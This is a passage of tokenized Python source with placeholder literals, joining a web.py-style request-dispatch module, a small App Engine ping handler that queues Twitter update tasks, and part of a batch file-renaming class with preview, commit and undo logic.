<EOL> ctx . protocol = '<STR_LIT:http>' <EOL> ctx . homedomain = ctx . protocol + '<STR_LIT>' + env . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ctx . homepath = os . environ . get ( '<STR_LIT>' , env . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> ctx . home = ctx . homedomain + ctx . homepath <EOL> ctx . realhome = ctx . home <EOL> ctx . ip = env . get ( '<STR_LIT>' ) <EOL> ctx . method = env . get ( '<STR_LIT>' ) <EOL> ctx . path = env . get ( '<STR_LIT>' ) <EOL> if env . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) : <EOL> ctx . path = lstrips ( env . get ( '<STR_LIT>' ) . split ( '<STR_LIT:?>' ) [ <NUM_LIT:0> ] , ctx . homepath ) <EOL> ctx . path = urllib . unquote ( ctx . path ) <EOL> if env . get ( '<STR_LIT>' ) : <EOL> ctx . query = '<STR_LIT:?>' + env . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> ctx . query = '<STR_LIT>' <EOL> ctx . fullpath = ctx . path + ctx . query <EOL> for k , v in ctx . iteritems ( ) : <EOL> if isinstance ( v , str ) : <EOL> ctx [ k ] = v . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) <EOL> ctx . status = '<STR_LIT>' <EOL> ctx . app_stack = [ ] <EOL> def _delegate ( self , f , fvars , args = [ ] ) : <EOL> def handle_class ( cls ) : <EOL> meth = web . ctx . method <EOL> if meth == '<STR_LIT>' and not hasattr ( cls , meth ) : <EOL> meth = '<STR_LIT:GET>' <EOL> if not hasattr ( cls , meth ) : <EOL> raise web . nomethod ( cls ) <EOL> tocall = getattr ( cls ( ) , meth ) <EOL> return tocall ( * args ) <EOL> def is_class ( o ) : return isinstance ( o , ( types . ClassType , type ) ) <EOL> if f is None : <EOL> raise web . notfound ( ) <EOL> elif isinstance ( f , application ) : <EOL> return f . handle_with_processors ( ) <EOL> elif is_class ( f ) : <EOL> return handle_class ( f ) <EOL> elif isinstance ( f , basestring ) : <EOL> if f . startswith ( '<STR_LIT>' ) : <EOL> url = f . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> if web . ctx . method == "<STR_LIT:GET>" : <EOL> x = web . ctx . env . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if x : <EOL> url += '<STR_LIT:?>' + x <EOL> raise web . redirect ( url ) <EOL> elif '<STR_LIT:.>' in f : <EOL> mod , cls = f . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> mod = __import__ ( mod , None , None , [ '<STR_LIT>' ] ) <EOL> cls = getattr ( mod , cls ) <EOL> else : <EOL> cls = fvars [ f ] <EOL> return handle_class ( cls ) <EOL> elif hasattr ( f , '<STR_LIT>' ) : <EOL> return f ( ) <EOL> else : <EOL> return web . notfound ( ) <EOL> def _match ( self , mapping , value ) : <EOL> for pat , what in mapping : <EOL> if isinstance ( what , application ) : <EOL> if value . startswith ( pat ) : <EOL> f = lambda : self . _delegate_sub_application ( pat , what ) <EOL> return f , None <EOL> else : <EOL> continue <EOL> elif isinstance ( what , basestring ) : <EOL> what , result = utils . re_subm ( '<STR_LIT>' + pat + '<STR_LIT:$>' , what , value ) <EOL> else : <EOL> result = utils . re_compile ( '<STR_LIT>' + pat + '<STR_LIT:$>' ) . match ( value ) <EOL> if result : <EOL> return what , [ x for x in result . groups ( ) ] <EOL> return None , None <EOL> def _delegate_sub_application ( self , dir , app ) : <EOL> """<STR_LIT>""" <EOL> web . ctx . _oldctx = web . storage ( web . ctx ) <EOL> web . ctx . home += dir <EOL> web . ctx . homepath += dir <EOL> web . ctx . path = web . ctx . path [ len ( dir ) : ] <EOL> web . ctx . fullpath = web . ctx . fullpath [ len ( dir ) : ] <EOL> return app . handle_with_processors ( ) <EOL> def get_parent_app ( self ) : <EOL> if self in web . ctx . app_stack : <EOL> index = web . ctx . app_stack . index ( self ) <EOL> if index > <NUM_LIT:0> : <EOL> return web . ctx . app_stack [ index - <NUM_LIT:1> ] <EOL> def notfound ( self ) : <EOL> """<STR_LIT>""" <EOL> parent = self . get_parent_app ( ) <EOL> if parent : <EOL> return parent . notfound ( ) <EOL> else : <EOL> return web . _NotFound ( ) <EOL> def internalerror ( self ) : <EOL> """<STR_LIT>""" <EOL> parent = self . get_parent_app ( ) <EOL> if parent : <EOL> return parent . internalerror ( ) <EOL> elif web . config . get ( '<STR_LIT>' ) : <EOL> import debugerror <EOL> return debugerror . debugerror ( ) <EOL> else : <EOL> return web . _InternalError ( ) <EOL> class auto_application ( application ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> application . __init__ ( self ) <EOL> class metapage ( type ) : <EOL> def __init__ ( klass , name , bases , attrs ) : <EOL> type . __init__ ( klass , name , bases , attrs ) <EOL> path = attrs . get ( '<STR_LIT:path>' , '<STR_LIT:/>' + name ) <EOL> if path is not None : <EOL> self . add_mapping ( path , klass ) <EOL> class page : <EOL> path = None <EOL> __metaclass__ = metapage <EOL> self . page = page <EOL> subdir_application = application <EOL> class subdomain_application ( application ) : <EOL> """<STR_LIT>""" <EOL> def handle ( self ) : <EOL> host = web . ctx . host . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> fn , args = self . _match ( self . mapping , host ) <EOL> return self . _delegate ( fn , self . fvars , args ) <EOL> def _match ( self , mapping , value ) : <EOL> for pat , what in mapping : <EOL> if isinstance ( what , basestring ) : <EOL> what , result = utils . re_subm ( '<STR_LIT>' + pat + '<STR_LIT:$>' , what , value ) <EOL> else : <EOL> result = utils . re_compile ( '<STR_LIT>' + pat + '<STR_LIT:$>' ) . match ( value ) <EOL> if result : <EOL> return what , [ x for x in result . groups ( ) ] <EOL> return None , None <EOL> def loadhook ( h ) : <EOL> """<STR_LIT>""" <EOL> def processor ( handler ) : <EOL> h ( ) <EOL> return handler ( ) <EOL> return processor <EOL> def unloadhook ( h ) : <EOL> """<STR_LIT>""" <EOL> def processor ( handler ) : <EOL> try : <EOL> result = handler ( ) <EOL> is_generator = result and hasattr ( result , '<STR_LIT>' ) <EOL> except : <EOL> h ( ) <EOL> raise <EOL> if is_generator : <EOL> return wrap ( result ) <EOL> else : <EOL> h ( ) <EOL> return result <EOL> def wrap ( result ) : <EOL> def next ( ) : <EOL> try : <EOL> return result . next ( ) <EOL> except : <EOL> h ( ) <EOL> raise <EOL> result = iter ( result ) <EOL> while True : <EOL> yield next ( ) <EOL> return processor <EOL> def autodelegate ( prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> def internal ( self , arg ) : <EOL> if '<STR_LIT:/>' in arg : <EOL> first , rest = arg . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> func = prefix + first <EOL> args = [ '<STR_LIT:/>' + rest ] <EOL> else : <EOL> func = prefix + arg <EOL> args = [ ] <EOL> if hasattr ( self , func ) : <EOL> try : <EOL> return getattr ( self , func ) ( * args ) <EOL> except TypeError : <EOL> raise web . notfound ( ) <EOL> else : <EOL> raise web . notfound ( ) <EOL> return internal <EOL> class Reloader : <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> SUFFIX = '<STR_LIT>' <EOL> else : <EOL> SUFFIX = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> self . mtimes = { } <EOL> def __call__ ( self ) : <EOL> for mod in sys . modules . values ( ) : <EOL> self . check ( mod ) <EOL> def check ( self , mod ) : <EOL> if not ( mod and hasattr ( mod , '<STR_LIT>' ) and mod . __file__ ) : <EOL> return <EOL> try : <EOL> mtime = os . stat ( mod . __file__ ) . st_mtime <EOL> except ( OSError , IOError ) : <EOL> return <EOL> if mod . __file__ . endswith ( self . __class__ . SUFFIX ) and os . path . exists ( mod . __file__ [ : - <NUM_LIT:1> ] ) : <EOL> mtime = max ( os . stat ( mod . __file__ [ : - <NUM_LIT:1> ] ) . st_mtime , mtime ) <EOL> if mod not in self . mtimes : <EOL> self . mtimes [ mod ] = mtime <EOL> elif self . mtimes [ mod ] < mtime : <EOL> try : <EOL> reload ( mod ) <EOL> self . mtimes [ mod ] = mtime <EOL> except ImportError : <EOL> pass <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import doctest <EOL> doctest . testmod ( ) </s>
<s> import logging <EOL> import base . handlers <EOL> from birdfeeder import data <EOL> import birdfeeder . handlers . update <EOL> from pingersecret import SECRET <EOL> class FollowingHandler ( base . handlers . BaseHandler ) : <EOL> def get ( self ) : <EOL> if self . request . get ( '<STR_LIT>' ) != SECRET : <EOL> self . _write_input_error ( '<STR_LIT>' ) <EOL> return <EOL> self . _write_json ( data . FollowingData . get_following_list ( ) ) <EOL> class PingHandler ( base . handlers . BaseHandler ) : <EOL> def post ( self ) : <EOL> if self . request . get ( '<STR_LIT>' ) != SECRET : <EOL> self . _write_input_error ( '<STR_LIT>' ) <EOL> return <EOL> update_twitter_id = long ( self . request . get ( '<STR_LIT>' ) ) <EOL> update_status_id = long ( self . request . get ( '<STR_LIT>' ) ) <EOL> logging . info ( '<STR_LIT>' % ( <EOL> update_status_id , update_twitter_id ) ) <EOL> following_twitter_ids = data . FollowingData . get_following_twitter_ids ( <EOL> update_twitter_id ) <EOL> task_count = <NUM_LIT:0> <EOL> for following_twitter_id in following_twitter_ids : <EOL> logging . info ( '<STR_LIT>' % following_twitter_id ) <EOL> session = data . Session . get_by_twitter_id ( str ( following_twitter_id ) ) <EOL> if session : <EOL> session . enqueue_update_task ( <EOL> countdown = birdfeeder . handlers . update . PING_UPDATE_DELAY_SEC , <EOL> expected_status_id = update_status_id , <EOL> update_retry_count = <NUM_LIT:0> ) <EOL> task_count += <NUM_LIT:1> <EOL> else : <EOL> logging . info ( '<STR_LIT>' ) ; <EOL> self . response . out . write ( '<STR_LIT>' % task_count ) </s>
<s> from unicodedata import normalize <EOL> import fnmatch <EOL> import logging <EOL> import os <EOL> import re <EOL> import string <EOL> import helpers <EOL> from operator import itemgetter <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> class FileOps ( object ) : <EOL> def __init__ ( self , casemode = <NUM_LIT:0> , countpos = <NUM_LIT:0> , dirsonly = False , exclude = "<STR_LIT>" , <EOL> filesonly = False , hidden = False , ignorecase = False , <EOL> interactive = False , keepext = False , mediamode = False , <EOL> noclobber = False , recursive = False , regex = False , remdups = False , <EOL> remext = False , remnonwords = False , remsymbols = False , <EOL> simulate = False , spacemode = <NUM_LIT:0> , quiet = False , verbosity = <NUM_LIT:1> , <EOL> matchpattern = "<STR_LIT>" , replacepattern = "<STR_LIT>" , recursivedepth = <NUM_LIT:0> ) : <EOL> try : <EOL> self . _casemode = int ( casemode ) <EOL> except TypeError : <EOL> self . _casemode = <NUM_LIT:0> <EOL> try : <EOL> self . _countpos = int ( countpos ) <EOL> except TypeError : <EOL> self . _countpos = <NUM_LIT:0> <EOL> try : <EOL> self . _spacemode = int ( spacemode ) <EOL> except TypeError : <EOL> self . spacemode = <NUM_LIT:0> <EOL> self . _dirsonly = dirsonly <EOL> self . _filesonly = False if dirsonly else filesonly <EOL> self . _hidden = hidden <EOL> self . _ignorecase = ignorecase <EOL> self . _interactive = interactive <EOL> self . _keepext = keepext <EOL> self . _mediamode = mediamode <EOL> self . _noclobber = noclobber <EOL> self . _recursive = recursive <EOL> self . _regex = regex <EOL> self . _remdups = remdups <EOL> self . _remext = remext <EOL> self . _remnonwords = remnonwords <EOL> self . _remsymbols = remsymbols <EOL> self . _simulate = simulate <EOL> self . _recursivedepth = recursivedepth <EOL> self . _excludeedit = "<STR_LIT>" if not exclude else exclude <EOL> self . _matchedit = "<STR_LIT>" if not matchpattern else matchpattern <EOL> self . _replaceedit = "<STR_LIT>" if not replacepattern else replacepattern <EOL> self . _autostop = False <EOL> self . _countbase = <NUM_LIT:1> <EOL> self . _countfill = True <EOL> self . _countpreedit = "<STR_LIT>" <EOL> self . _countstep = <NUM_LIT:1> <EOL> self . _countsufedit = "<STR_LIT>" <EOL> self . _deletecheck = False <EOL> self . _deleteend = <NUM_LIT:1> <EOL> self . _deletestart = <NUM_LIT:0> <EOL> self . _filteredit = "<STR_LIT>" <EOL> self . _insertcheck = False <EOL> self . _insertedit = "<STR_LIT>" <EOL> self . _insertpos = <NUM_LIT:0> <EOL> self . _manualmirror = False <EOL> self . _matchcheck = True <EOL> self . _matchexcludecheck = False <EOL> self . _matchfiltercheck = False <EOL> self . _matchreplacecheck = True <EOL> self . _casecheck = True if isinstance ( casemode , str ) else False <EOL> self . _countcheck = True if isinstance ( countpos , str ) else False <EOL> removelist = [ remdups , remext , remnonwords , remsymbols ] <EOL> self . _removecheck = True if any ( removelist ) else False <EOL> self . _spacecheck = True if isinstance ( spacemode , str ) else False <EOL> self . stopupdate = False <EOL> self . stopcommit = False <EOL> self . includes = set ( ) <EOL> self . excludes = set ( ) <EOL> self . recursiveincludes = set ( ) <EOL> self . recursiveexcludes = set ( ) <EOL> self . configdir = helpers . get_configdir ( ) <EOL> helpers . configure_logger ( verbosity , quiet , self . configdir ) <EOL> self . history = [ ] <EOL> self . bracerx = re . compile ( "<STR_LIT>" ) <EOL> def match_filter ( self , target ) : <EOL> """<STR_LIT>""" <EOL> if not self . filteredit : <EOL> return True <EOL> if "<STR_LIT:/>" in self . filteredit : <EOL> patterns = self . filteredit . split ( "<STR_LIT:/>" ) <EOL> else : <EOL> patterns = [ self . filteredit ] <EOL> if self . regex : <EOL> for pattern in patterns : <EOL> try : <EOL> if re . search ( pattern , target , flags = self . ignorecase ) : <EOL> return True <EOL> except : <EOL> pass <EOL> else : <EOL> for pattern in patterns : <EOL> if fnmatch . fnmatch ( target , pattern ) : <EOL> return True <EOL> return False <EOL> def match_exclude ( self , target ) : <EOL> """<STR_LIT>""" <EOL> if not self . excludeedit : <EOL> return <EOL> if "<STR_LIT:/>" in self . excludeedit : <EOL> patterns = self . excludeedit . split ( "<STR_LIT:/>" ) <EOL> else : <EOL> patterns = [ self . excludeedit ] <EOL> if self . regex : <EOL> for pattern in patterns : <EOL> try : <EOL> if re . search ( pattern , target , flags = self . ignorecase ) : <EOL> return False <EOL> except : <EOL> pass <EOL> else : <EOL> for pattern in patterns : <EOL> if fnmatch . fnmatch ( target , pattern ) : <EOL> return False <EOL> def match ( self , target ) : <EOL> """<STR_LIT>""" <EOL> if not self . hidden and target . startswith ( "<STR_LIT:.>" ) and target not in self . includes : <EOL> return False <EOL> if self . matchexcludecheck : <EOL> if self . match_exclude ( target ) is False : <EOL> return False <EOL> if self . excludes and target in self . excludes : <EOL> return False <EOL> if self . includes and target in self . includes : <EOL> return True <EOL> if self . matchfiltercheck : <EOL> if self . match_filter ( target ) is False : <EOL> return False <EOL> return True <EOL> def get_dirs ( self , root , dirs ) : <EOL> """<STR_LIT>""" <EOL> return [ ( root , d , "<STR_LIT>" ) for d in dirs if self . match ( d ) ] <EOL> def get_files ( self , root , files ) : <EOL> """<STR_LIT>""" <EOL> return [ ( root , ) + os . path . splitext ( f ) for f in files if self . match ( f ) ] <EOL> def get_targets ( self , path = None ) : <EOL> """<STR_LIT>""" <EOL> if not path : <EOL> path = os . getcwd ( ) <EOL> levels = <NUM_LIT:0> <EOL> if self . recursive : <EOL> levels = self . recursivedepth <EOL> targets = [ ] <EOL> for root , dirs , files in helpers . walklevels ( path , levels ) : <EOL> root += "<STR_LIT:/>" <EOL> if self . dirsonly : <EOL> target = self . get_dirs ( root , dirs ) <EOL> elif self . filesonly : <EOL> target = self . get_files ( root , files ) <EOL> else : <EOL> target = self . get_dirs ( root , dirs ) + self . get_files ( root , files ) <EOL> targets . extend ( target ) <EOL> if self . stopupdate : <EOL> return targets <EOL> if self . countcheck : <EOL> return sorted ( targets , key = lambda i : i [ <NUM_LIT:1> ] + i [ <NUM_LIT:2> ] ) <EOL> else : <EOL> return targets <EOL> def get_previews ( self , targets , matchpat = None , replacepat = None ) : <EOL> """<STR_LIT>""" <EOL> if matchpat is not None : <EOL> self . matchedit = matchpat <EOL> if replacepat is not None : <EOL> self . replaceedit = replacepat <EOL> if self . mediamode : <EOL> self . set_mediaoptions ( ) <EOL> return self . modify_previews ( targets ) <EOL> def set_mediaoptions ( self ) : <EOL> self . casecheck = True <EOL> self . spacecheck = True <EOL> self . removecheck = True <EOL> self . casemode = <NUM_LIT:0> <EOL> self . spacemode = <NUM_LIT:6> <EOL> self . remdups = True <EOL> self . keepext = True <EOL> self . remsymbols = True <EOL> def commit ( self , previews ) : <EOL> actions = sorted ( ( ( "<STR_LIT>" . join ( i [ <NUM_LIT:0> ] ) , i [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] + i [ <NUM_LIT:1> ] ) for i in previews ) , <EOL> key = lambda i : i [ <NUM_LIT:0> ] . count ( "<STR_LIT:/>" ) , reverse = True ) <EOL> for i in actions : <EOL> log . debug ( "<STR_LIT>" . format ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] ) ) <EOL> if i [ <NUM_LIT:0> ] == i [ <NUM_LIT:1> ] : <EOL> log . warn ( "<STR_LIT>" ) <EOL> continue <EOL> if self . simulate : <EOL> continue <EOL> if self . stopcommit : <EOL> idx = actions . index ( i ) <EOL> log . warn ( "<STR_LIT>" . format ( idx + <NUM_LIT:1> ) ) <EOL> if idx : <EOL> log . warn ( "<STR_LIT>" ) <EOL> self . history . append ( actions [ : idx + <NUM_LIT:1> ] ) <EOL> return <EOL> try : <EOL> os . rename ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] ) <EOL> except Exception as e : <EOL> log . debug ( "<STR_LIT>" . format ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] , e ) ) <EOL> if self . autostop : <EOL> break <EOL> self . history . append ( actions ) <EOL> log . info ( "<STR_LIT>" ) <EOL> def undo ( self , actions = None ) : <EOL> if actions is None : <EOL> try : <EOL> actions = self . history . pop ( ) <EOL> except IndexError : <EOL> log . error ( "<STR_LIT>" ) <EOL> return <EOL> for i in actions : <EOL> log . debug ( "<STR_LIT>" . format ( i [ <NUM_LIT:1> ] , i [ <NUM_LIT:0> ] ) ) <EOL> if self . simulate : <EOL> continue <EOL> try : <EOL> os . rename ( i [ <NUM_LIT:1> ] , i [ <NUM_LIT:0> ] ) <EOL> except Exception as e : <EOL> log . error ( "<STR_LIT>" . format ( i [ <NUM_LIT:1> ] , i [ <NUM_LIT:0> ] , e ) ) <EOL> if self . autostop : <EOL> break <EOL> log . info ( "<STR_LIT>" ) <EOL> def modify_previews ( self , previews ) : <EOL> if self . countcheck : <EOL> lenp , base , step = len ( previews ) , self . countbase , self . countstep <EOL> countlen = len ( str ( lenp ) ) <EOL> countrange = xrange ( base , lenp * step + <NUM_LIT:1> , step ) <EOL> if self . countfill : <EOL> count = ( str ( i ) . rjust ( countlen , "<STR_LIT:0>" ) for i in countrange ) <EOL> else : <EOL> count = ( str ( i ) for i in countrange ) <EOL> modified = [ ] <EOL> for preview in previews : <EOL> name = preview [ <NUM_LIT:1> ] <EOL> if not self . remext and not self . keepext : <EOL> name += preview [ <NUM_LIT:2> ] <EOL> if self . casecheck : <EOL> name = self . apply_case ( name ) <EOL> if self . spacecheck : <EOL> name = self . apply_space ( name ) <EOL> if self . deletecheck : <EOL> name = self . apply_delete ( name ) <EOL> if self . removecheck : <EOL> name = self . apply_remove ( name ) <EOL> if self . insertcheck : <EOL> name = self . apply_insert ( name ) <EOL> if self . matchcheck : <EOL> name = self . apply_replace ( name ) <EOL> if self . countcheck : <EOL> try : <EOL> name = self . apply_count ( name , count . next ( ) ) <EOL> except StopIteration : <EOL> pass <EOL> if self . keepext : <EOL> name += preview [ <NUM_LIT:2> ] <EOL> preview = ( ( preview [ <NUM_LIT:0> ] , preview [ <NUM_LIT:1> ] + preview [ <NUM_LIT:2> ] ) , name ) <EOL> modified . append ( preview ) <EOL> return modified <EOL> def apply_space ( self , s ) : <EOL> if not self . spacecheck : <EOL> return s <EOL> if self . spacemode == <NUM_LIT:0> : <EOL> s = s . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) <EOL> elif self . spacemode == <NUM_LIT:1> : <EOL> s = s . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:->" ) <EOL> elif self . spacemode == <NUM_LIT:2> : <EOL> s = s . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:.>" ) <EOL> elif self . spacemode == <NUM_LIT:3> : <EOL> s = s . replace ( "<STR_LIT:.>" , "<STR_LIT:U+0020>" ) <EOL> elif self . spacemode == <NUM_LIT:4> : <EOL> s = s . replace ( "<STR_LIT:->" , "<STR_LIT:U+0020>" ) <EOL> elif self . spacemode == <NUM_LIT:5> : <EOL> s = s . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) <EOL> elif self . spacemode == <NUM_LIT:6> : <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT:_>" , s ) <EOL> return s <EOL> def apply_case ( self , s ) : <EOL> if not self . casecheck : <EOL> return s <EOL> if self . casemode == <NUM_LIT:0> : <EOL> s = s . lower ( ) <EOL> elif self . casemode == <NUM_LIT:1> : <EOL> s = s . upper ( ) <EOL> elif self . casemode == <NUM_LIT:2> : <EOL> s = s . capitalize ( ) <EOL> elif self . casemode == <NUM_LIT:3> : <EOL> s = "<STR_LIT:U+0020>" . join ( [ c . capitalize ( ) for c in s . split ( ) ] ) <EOL> return s <EOL> def apply_insert ( self , s ) : <EOL> if not self . insertcheck or not self . insertedit : <EOL> return s <EOL> s = list ( s ) <EOL> s . insert ( self . insertpos , self . insertedit ) <EOL> return "<STR_LIT>" . join ( s ) <EOL> def apply_count ( self , s , count ) : <EOL> if not self . countcheck : <EOL> return s <EOL> s = list ( s ) <EOL> if self . countpreedit : <EOL> count = self . countpreedit + count <EOL> if self . countsufedit : <EOL> count += self . countsufedit <EOL> s . insert ( self . countpos , count ) <EOL> return "<STR_LIT>" . join ( s ) <EOL> def apply_delete ( self , s ) : <EOL> if not self . deletecheck : <EOL> return s <EOL> return s [ : self . deletestart ] + s [ self . deleteend : ] <EOL> def apply_remove ( self , s ) : <EOL> if not self . removecheck : <EOL> return s <EOL> if self . remnonwords : <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT>" , s , flags = self . ignorecase ) <EOL> if self . remsymbols : <EOL> allowed = string . ascii_letters + string . digits + "<STR_LIT>" <EOL> for i in [ "<STR_LIT:utf-8>" , "<STR_LIT>" ] : <EOL> try : <EOL> s = "<STR_LIT>" . join ( c for c in normalize ( "<STR_LIT>" , s . decode ( i ) ) <EOL> if c in allowed ) . encode ( "<STR_LIT:utf-8>" ) <EOL> break <EOL> except UnicodeDecodeError : <EOL> pass <EOL> else : <EOL> log . debug ( "<STR_LIT>" . format ( s ) ) <EOL> if self . remdups : <EOL> s = re . sub ( r"<STR_LIT>" , r"<STR_LIT>" , s , flags = self . ignorecase ) <EOL> return s <EOL> def apply_replace ( self , s ) : <EOL> if not self . matchreplacecheck or not self . matchedit : <EOL> return s <EOL> if not self . regex : <EOL> matchpat = fnmatch . translate ( self . matchedit ) <EOL> replacepat = helpers . translate ( self . replaceedit ) <EOL> else : <EOL> matchpat = self . matchedit <EOL> replacepat = self . replaceedit <EOL> try : <EOL> s = re . sub ( matchpat , replacepat , s , flags = self . ignorecase ) <EOL> except : <EOL> pass <EOL> return s <EOL> @ property <EOL> def dirsonly ( self ) : <EOL> return self . _dirsonly <EOL> @ dirsonly . setter <EOL> def dirsonly ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _dirsonly = boolean <EOL> if boolean : <EOL> self . filesonly = False <EOL> @ property <EOL> def filesonly ( self ) : <EOL> return self . _filesonly <EOL> @ filesonly . setter <EOL> def filesonly ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _filesonly = boolean <EOL> if boolean : <EOL> self . dirsonly = False <EOL> @ property <EOL> def recursive ( self ) : <EOL> return self . _recursive <EOL> @ recursive . setter <EOL> def recursive ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _recursive = boolean <EOL> @ property <EOL> def recursivedepth ( self ) : <EOL> return self . _recursivedepth <EOL> @ recursivedepth . setter <EOL> def recursivedepth ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _recursivedepth = num <EOL> @ property <EOL> def hidden ( self ) : <EOL> return self . _hidden <EOL> @ hidden . setter <EOL> def hidden ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _hidden = boolean <EOL> @ property <EOL> def simulate ( self ) : <EOL> return self . _simulate <EOL> @ simulate . setter <EOL> def simulate ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _simulate = boolean <EOL> @ property <EOL> def interactive ( self ) : <EOL> return self . _interactive <EOL> @ interactive . setter <EOL> def interactive ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _interactive = boolean <EOL> @ property <EOL> def noclobber ( self ) : <EOL> return self . _noclobber <EOL> @ noclobber . setter <EOL> def noclobber ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _noclobber = boolean <EOL> @ property <EOL> def keepext ( self ) : <EOL> return self . _keepext <EOL> @ keepext . setter <EOL> def keepext ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _keepext = boolean <EOL> @ property <EOL> def regex ( self ) : <EOL> return self . _regex <EOL> @ regex . setter <EOL> def regex ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _regex = boolean <EOL> @ property <EOL> def varcheck ( self ) : <EOL> return self . _varcheck <EOL> @ varcheck . setter <EOL> def varcheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _varcheck = boolean <EOL> @ property <EOL> def matchcheck ( self ) : <EOL> return self . _matchcheck <EOL> @ matchcheck . setter <EOL> def matchcheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _matchcheck = boolean <EOL> @ property <EOL> def matchexcludecheck ( self ) : <EOL> return self . _matchexcludecheck <EOL> @ matchexcludecheck . setter <EOL> def matchexcludecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _matchexcludecheck = boolean <EOL> @ property <EOL> def matchfiltercheck ( self ) : <EOL> return self . _matchfiltercheck <EOL> @ matchfiltercheck . setter <EOL> def matchfiltercheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _matchfiltercheck = boolean <EOL> @ property <EOL> def matchreplacecheck ( self ) : <EOL> return self . _matchreplacecheck <EOL> @ matchreplacecheck . setter <EOL> def matchreplacecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _matchreplacecheck = boolean <EOL> @ property <EOL> def countpreedit ( self ) : <EOL> return self . _countpreedit <EOL> @ countpreedit . setter <EOL> def countpreedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _countpreedit = text <EOL> @ property <EOL> def countsufedit ( self ) : <EOL> return self . _countsufedit <EOL> @ countsufedit . setter <EOL> def countsufedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _countsufedit = text <EOL> @ property <EOL> def insertedit ( self ) : <EOL> return self . _insertedit <EOL> @ insertedit . setter <EOL> def insertedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _insertedit = text <EOL> @ property <EOL> def matchedit ( self ) : <EOL> return self . _matchedit <EOL> @ matchedit . setter <EOL> def matchedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _matchedit = text <EOL> @ property <EOL> def replaceedit ( self ) : <EOL> return self . _replaceedit <EOL> @ replaceedit . setter <EOL> def replaceedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _replaceedit = text <EOL> @ property <EOL> def filteredit ( self ) : <EOL> return self . _filteredit <EOL> @ filteredit . setter <EOL> def filteredit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _filteredit = text <EOL> @ property <EOL> def excludeedit ( self ) : <EOL> return self . _excludeedit <EOL> @ excludeedit . setter <EOL> def excludeedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _excludeedit = text <EOL> @ property <EOL> def remsymbols ( self ) : <EOL> return self . _remsymbols <EOL> @ remsymbols . setter <EOL> def remsymbols ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _remsymbols = boolean <EOL> @ property <EOL> def autostop ( self ) : <EOL> return self . _autostop <EOL> @ autostop . setter <EOL> def autostop ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _autostop = boolean <EOL> @ property <EOL> def manualmirror ( self ) : <EOL> return self . _manualmirror <EOL> @ manualmirror . setter <EOL> def manualmirror ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _manualmirror = boolean <EOL> @ property <EOL> def removecheck ( self ) : <EOL> return self . _removecheck <EOL> @ removecheck . setter <EOL> def removecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _removecheck = boolean <EOL> @ property <EOL> def remdups ( self ) : 